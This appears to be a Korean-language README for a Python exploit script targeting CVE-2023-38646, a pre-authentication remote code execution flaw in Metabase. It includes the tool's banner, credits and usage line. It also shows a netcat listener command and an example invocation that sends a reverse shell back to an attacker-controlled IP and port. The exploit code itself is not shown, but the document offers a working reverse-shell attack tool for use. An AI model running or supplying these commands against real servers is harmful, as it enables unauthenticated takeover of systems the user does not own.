
CVE-2023-38646를 위한 Python 익스플로잇 스크립트로, Metabase의 사전 인증 원격 코드 실행 취약점을 이용하여 공격자 제어 호스트로 리버스 셸을 전달합니다.
"이 취약점(CVE-2023–38646로 지정됨)은 공격자가 인증 없이 서버에서 임의의 명령을 실행할 수 있도록 허용했습니다." "cve-2023-38646를 위한 빠른 리버스 셸 익스플로잇 스크립트입니다." "이 취약점을 발견한 것은 아니며, 스크립트만 제작했습니다."
root@box:~/CVE-2023-38646# python3 exploit.py
_______ ________ ___ ___ ___ ____ ____ ___ __ _ _ __
/ ____\ \ / / ____| |__ \ / _ \__ \|___ \ |___ \ / _ \ / /| || | / /
| | \ \ / /| |__ ______ ) | | | | ) | __) |_____ __) | (_) |/ /_| || |_ / /_
| | \ \/ / | __|______/ /| | | |/ / |__ <______|__ < > _ <| '_ \__ _| '_ \
| |____ \ / | |____ / /_| |_| / /_ ___) | ___) | (_) | (_) | | | | (_) |
\_____| \/ |______| |____|\___/____|____/ |____/ \___/ \___/ |_| \___/
author: c0rnbread
credits:
https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
https://raw.githubusercontent.com/kh4sh3i/CVE-2023-38646/main/CVE-2023-38646.py
Usage: python3 exploit.py <url> <local-ip> <local-port>
Run using base url and local IP and port for reverse shell
root@box:~/CVE-2023-38646# nc -lvnp 4444
root@box:~/CVE-2023-38646# python3 exploit.py http://example.com 10.10.10.2 4444